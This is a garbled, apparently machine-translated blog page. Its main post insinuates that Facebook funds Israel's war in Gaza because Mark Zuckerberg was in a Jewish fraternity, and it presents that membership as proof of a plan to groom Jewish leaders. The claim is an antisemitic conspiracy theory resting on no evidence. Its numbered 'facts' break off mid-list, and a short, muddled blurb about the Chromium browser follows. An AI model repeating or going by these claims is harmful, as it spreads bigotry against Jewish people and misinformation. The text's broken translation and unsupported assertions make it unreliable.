Facebook phenomena such uproar in Indonesia, to have facebook-up in indonesian language. I wonder remarkably, one by one my friends on facebook register. No wonder that in 2008 facebook meraup profit 300 million U.S. dollars for more than 140 million active users worldwide and 8.5 million photos uploaded every day. For those who have not yet know what the facebook can read this article. Facebook provides much easier for us, from start to find a relationship money from facebook, also read this article and this article. But the benefits of the use for finanace war in Gaza. Really?

At first I did not intentionally reseach on facebook. From the very beginning I do not agree with the Israeli aggression in Gaza. Gaza residents to help, I can only pray and intend to boycott
products of Israel. From an article I published some time ago about the product boycott
American products, there are comments that say that the facebook and wordpress is owned by U.S. and suggest not to use again. From this early beginning, I do reseach on facebook and wordpress.

The facts - facts:

1. Facebook is the property of Mark Zuckerberg, if we read the article in Mark Zuckerberg

indonesian not fully known who he was. If we read the articles about Mark Zuckerberg

in English there is a complete data itself is the creator of the facebook.

2. Who is the founder of the CEO as well as facebook this? He is harvard university and college students

active as a member of Alpha Epsilon Pi. What is Alpha Epsilon Pi? read this article.

3. Alpha Epsilon Pi is like the Jewish student association in the northern United States, which has a mission

as follows,

Alpha Epsilon Pi, the Jewish Fraternity of North America, was founded to provide opportunities for Jewish

men seeking the best possible college experience and Fraternity. We have maintained the integrity of our

purpose by strengthening our ties to the Jewish community and serving as a link between high school and

career. Alpha Epsilon Pi develops leadership for the North American Jewish community at a critical time in a

young man's life. Alpha Epsilon Pi's role is to encourage the Jewish student to remain dedicated to Jewish

ideals, values, and ethics and to prepare the student to be one of tomorrow's leaders so that he may help

himself, his family, his community, and his people.

Which is essentially as a place where pengkaderan and find a new leader for his people, that is

Jews.

4. Fact-to-four articles were written to attack Israel in Gaza has killed more than 600

palestinians.

5. Facebook benefit from the ads that is, the more users and visitors to facebook


http://www.kamusmalesbanget.com/

Read more...

About Chromium

Chromium is an open-source browser project that provides a safer, faster, and more stable way for all Internet users to experience the web. Google's browser Chrome, is built from the Chromium source code, so Chromium has many of the features that make Google Chrome so great, separate processes for each window, the omnibar, the Task Manager, and incognito browsing but none of the hassles like Google's or an Update Utility EULA.

Do you want to compile the code yourself or help with development? You can do both by visiting the developer page here (Visual Studio 2005 is required to compile).
so conclusion, Google chrome is now take the Chromium source code is open source browser built for the new view similar with google chrome.

Read more...

  © Blogger template Columnus by Ourblogtemplates.com 2008

Back to TOP